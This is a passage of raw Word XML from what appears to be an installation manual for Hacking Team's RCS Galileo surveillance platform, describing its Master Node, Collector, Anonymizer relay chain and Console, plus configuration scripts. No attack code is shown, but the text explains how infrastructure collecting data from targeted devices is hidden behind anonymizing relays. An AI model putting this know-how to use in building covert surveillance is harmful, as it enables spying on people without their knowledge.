                  <wp:simplePos x="1504950" y="4743450"/>
                  <wp:positionH relativeFrom="margin">
                    <wp:align>left</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="margin">
                    <wp:align>top</wp:align>
                  </wp:positionV>
                  <wp:extent cx="4629150" cy="4134054"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>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4134054"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r w:rsidR="0060757D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidR="00175976">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">istributed </w:t>
            </w:r>
            <w:r w:rsidR="0060757D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00175976">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">rchitecture </w:t>
            </w:r>
            <w:r w:rsidR="0060757D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="00175976">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>omponents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DD31ED" w:rsidRDefault="00DD31ED" w:rsidP="007113E8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DD31ED" w:rsidRDefault="00DD31ED" w:rsidP="00DD31ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E1590E" w:rsidRDefault="00F25C6C" w:rsidP="00E1590E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The table below lists the 4 main RCS components and provides a brief description for each of them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E1590E" w:rsidRDefault="00E1590E" w:rsidP="00E1590E"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1838"/>
        <w:gridCol w:w="7790"/>
      </w:tblGrid>
      <w:tr w:rsidR="006102C4" w:rsidTr="006102C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838" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006102C4" w:rsidRDefault="006102C4" w:rsidP="006102C4">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006102C4" w:rsidRDefault="006102C4" w:rsidP="006102C4">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6102C4" w:rsidTr="00811E7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6102C4" w:rsidRDefault="006102C4" w:rsidP="006102C4">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Master Node</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006102C4" w:rsidRDefault="00AA1BD4" w:rsidP="00AA1BD4">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Heart of the RCS installation, it manages data flows and all components status.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006102C4" w:rsidTr="00811E78">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6102C4" w:rsidRDefault="006102C4" w:rsidP="006102C4">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Collector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006102C4" w:rsidRDefault="00AC2BF0" w:rsidP="00AC2BF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RCS component that collects data from target devices.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006102C4" w:rsidTr="00811E7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6102C4" w:rsidRDefault="006102C4" w:rsidP="006102C4">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Anonymizer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006102C4" w:rsidRDefault="00AC2BF0" w:rsidP="006102C4">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VPS (Virtual Private Server) that guarantee Collector anonymity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006102C4" w:rsidTr="00811E78">
        <w:trPr>
          <w:trHeight w:val="68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6102C4" w:rsidRDefault="006102C4" w:rsidP="006102C4">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Console</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006102C4" w:rsidRDefault="00AC2BF0" w:rsidP="00AC2BF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Client/server software used by RCS users in order to manage the entire system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00337EFA" w:rsidRDefault="00337EFA" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00337EFA" w:rsidRDefault="00337EFA" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00797C69" w:rsidRDefault="00797C69" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The installation of Master Node, Collector and Console is performed through installation packages directly provided by Hacking Team staff during delivery operations and always available within Support Portal (according to client’s maintenance license). The Anonymizer installation is managed within the RCS Console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797C69" w:rsidRDefault="00797C69" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00797C69" w:rsidRDefault="00FB7486" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The minimum systems requirements information for each system are always provided within </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7486">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCS Galileo Technical Requirements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> document, delivered from </w:t>
      </w:r>
      <w:r w:rsidR="00B90945">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>acking Team before installation phases.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90945" w:rsidRDefault="00B90945" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B90945" w:rsidRDefault="00B90945" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B90945" w:rsidRDefault="00B90945" w:rsidP="00B90945">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4570169" cy="2520000"/>
            <wp:effectExtent l="0" t="0" r="190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0169" cy="2520000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006311A1" w:rsidRDefault="006311A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F748CD" w:rsidRPr="004A4237" w:rsidRDefault="00F748CD" w:rsidP="00A719CD">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc372642477"/>
      <w:r w:rsidRPr="004A4237">
        <w:lastRenderedPageBreak/>
        <w:t>Backend and Frontend Advanced Configuration (scripts)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00F748CD" w:rsidRPr="004A4237" w:rsidRDefault="00F748CD" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007113E8" w:rsidRPr="004A4237" w:rsidRDefault="003E15D6" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After the installation of RCS Galileo, some scripts are immediately available in order to perform customized configurations or to solve problems in the event that not all the RCS components are up and running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071587C" w:rsidRPr="004A4237" w:rsidRDefault="0071587C" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E15D6" w:rsidRPr="004A4237" w:rsidRDefault="003E15D6" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The 2 most important scripts which is good to be able to master are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E15D6" w:rsidRPr="004A4237" w:rsidRDefault="003E15D6" w:rsidP="003E15D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E15D6" w:rsidRPr="004A4237" w:rsidRDefault="003E15D6" w:rsidP="003E15D6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rcs-db-config</w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  (located in  </w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\RCS\DB\bin\</w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  folder)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E15D6" w:rsidRPr="004A4237" w:rsidRDefault="003E15D6" w:rsidP="003E15D6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rcs-collector-config</w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  (located in  </w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\RCS\Collector\bin\</w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  folder)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E15D6" w:rsidRPr="004A4237" w:rsidRDefault="003E15D6" w:rsidP="003E15D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A4237" w:rsidRPr="004A4237" w:rsidRDefault="004A4237" w:rsidP="003E15D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The two images below show the output of the scripts followed by the parameter  </w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--help</w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A4237" w:rsidRPr="004A4237" w:rsidRDefault="004A4237" w:rsidP="003E15D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0071587C" w:rsidRPr="004A4237" w:rsidRDefault="0071587C" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6115050" cy="4124325"/>
            <wp:effectExtent l="0" t="0" r="0"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124325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071587C" w:rsidRPr="004A4237" w:rsidRDefault="0071587C" w:rsidP="0071587C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0071587C" w:rsidRPr="004A4237" w:rsidRDefault="0071587C" w:rsidP="0071587C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rcs-db-config</w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Script Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071587C" w:rsidRPr="004A4237" w:rsidRDefault="0071587C" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0071587C" w:rsidRPr="004A4237" w:rsidRDefault="0071587C" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0071587C" w:rsidRPr="004A4237" w:rsidRDefault="0071587C" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D05DAA" w:rsidRPr="004A4237" w:rsidRDefault="00D05DAA" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D05DAA" w:rsidRPr="004A4237" w:rsidRDefault="00D05DAA" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D05DAA" w:rsidRPr="004A4237" w:rsidRDefault="00D05DAA" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6115050" cy="4124325"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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124325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D05DAA" w:rsidRPr="004A4237" w:rsidRDefault="00D05DAA" w:rsidP="00D05DAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D05DAA" w:rsidRPr="004A4237" w:rsidRDefault="00D05DAA" w:rsidP="00D05DAA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rcs-collector-config</w:t>
      </w:r>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Script Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D05DAA" w:rsidRPr="004A4237" w:rsidRDefault="00D05DAA" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006311A1" w:rsidRDefault="006311A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F748CD" w:rsidRPr="00E26F92" w:rsidRDefault="00F748CD" w:rsidP="00A719CD">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc372642478"/>
      <w:r w:rsidRPr="00E26F92">
        <w:lastRenderedPageBreak/>
        <w:t>Anonymizers Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00F748CD" w:rsidRDefault="00F748CD" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00600C68" w:rsidRPr="005361EF" w:rsidRDefault="00600C68" w:rsidP="00600C68">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005361EF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Anonymizer is a mandatory RCS element that must be installed by System Administrator role within the “System &gt; Frontend” section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01F54" w:rsidRDefault="00A01F54" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005361EF" w:rsidRDefault="003C4352" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The job of an Anonymizer is to forward the network traffic from the previous hop (Anonymizer or Target) to the next one (Anonymizer or Collector). During the transfer, the entire network traffic remains encrypted and compressed and communications between the different hops are subject to the exchange of a certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005361EF" w:rsidRDefault="005361EF" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C4352" w:rsidRDefault="003C4352" w:rsidP="003C4352">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The image below shows the pop-up window for the creation of a new Anonymizer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C4352" w:rsidRPr="005361EF" w:rsidRDefault="003C4352" w:rsidP="007113E8">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84"/>
        <w:gridCol w:w="4808"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidTr="002E184E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="003A4380" w:rsidP="00947612">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>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1" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:3in;height:176.35pt;z-index:251887616;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId18" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1601" DrawAspect="Content" ObjectID="_1446455335" r:id="rId19"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00EF6281" w:rsidP="00E512A6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00A01F54" w:rsidRPr="005361EF">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00E512A6">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00A01F54" w:rsidRPr="005361EF">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> [ RCS Console ] System &gt; Frontend &gt; New Anonymizer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00947612">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
          </w:tcPr>
